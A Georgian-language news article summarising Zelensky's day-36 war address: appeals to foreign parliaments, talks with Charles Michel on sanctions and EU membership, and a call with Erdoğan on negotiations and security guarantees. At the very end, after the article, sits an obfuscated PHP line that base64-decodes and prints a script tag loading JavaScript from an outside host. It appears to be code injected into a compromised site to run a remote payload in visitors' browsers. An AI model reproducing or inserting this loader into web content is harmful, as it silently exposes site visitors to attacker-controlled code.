celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ ომის დაწყებიდან 36–ე დღის შემაჯამებელ ვიდეომიმართვაში აღნიშნა, რომ დღეს რამდენიმე ქვეყნის პარლამენტს სიტყვით მიმართა და მათგან დანადგომის და მხარდაჭერის იმედი აქვს. 
  
მისივე თქმით, ის დღეს ესაუბრა შარლ მიშელს უკრაინის ევროკავშირში გაწევრიანების საკითხზე. 
 
"დღეს სხვადასხვა ქვეყნის პარლამენტს მივმართე, ავსტრალიის, ბელგიის, ნიდერლანდების... სრული მხარდაჭერა ვიგრძენი და ახლა კონკრეტულ გამოხმაურებებს ველოდები, რაც რუსეთის წინააღმდეგ სანქციების გაძლიერებას შეეხება. უნდა გავაგრძელოთ შეზღუდვების კიდევ უფრო გამკაცრება, ვიდრე მტერი აგრესიას არ შეწყვეტს. ამის შესახებ ვესაუბრე შარლ მიშელსაც. ჩვენი პარტნიორებისგან მეტ დახმარებას დაუყოვნებლივ მოვითხოვთ. სანქციების გარდა, შარლ მიშელთან, ეკონომიკური დახმარებისა და ჩვენი აღმშენებლობისთვის საჭირო ფინანსებიც განვიხილე. ვისაუბრეთ უკრაინის ევროკავშირში სწრაფ გაწევრიანებაზეც.
 
ანალოგიური შინაარსის საუბარი ჰქონდა ჩემი ადმინისტრაციის ხელმძღვანელს პრეზიდენტ ჯო ბაიდენის მრჩეველთან, ჯეიკ სალივანთან. განვიხილეთ ეროვნული უსაფრთხოების საკითხები. აშშ-მ რუსეთის წინააღმდეგ ახალი სანქციები შეიმუშავა, რისთვისაც მადლიერი ვარ. 
 
დაე, მოსკოვში არ დაავიწყდეთ, რომ სანქციების პოლიტიკა კიდევ გაგრძელდება და უფრო გაძლიერდება. სანამ რუსეთი უფრო მეტ ძალისხმევას არ ჩადებს მშვიდობის დამყარებაში, ვიდრე ჩვენს განადგურებაში დებს, სანქციები არ შეჩერდება და ეს იქნება უალტერნატივო გზა. 
 
ვესაუბრე თურქეთის პრეზიდენტ რეჯეპ თაიფ ერდოღანსაც. ვისაუბრეთ უკრაინულ და რუსულ მხარეებს შორის თურქეთში გამართულ მოლაპარაკებებზე. ასევე, ჩვენი ქვეყნის უსაფრთხოების გარანტიებზე. დიდი მადლობა თურქეთს, რომ მზად არიან, უკრაინის უსაფრთხოების გარანტორები გახდნენ." – განაცხადა ზელენსკიმ.
 
 
 
 
 
718
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");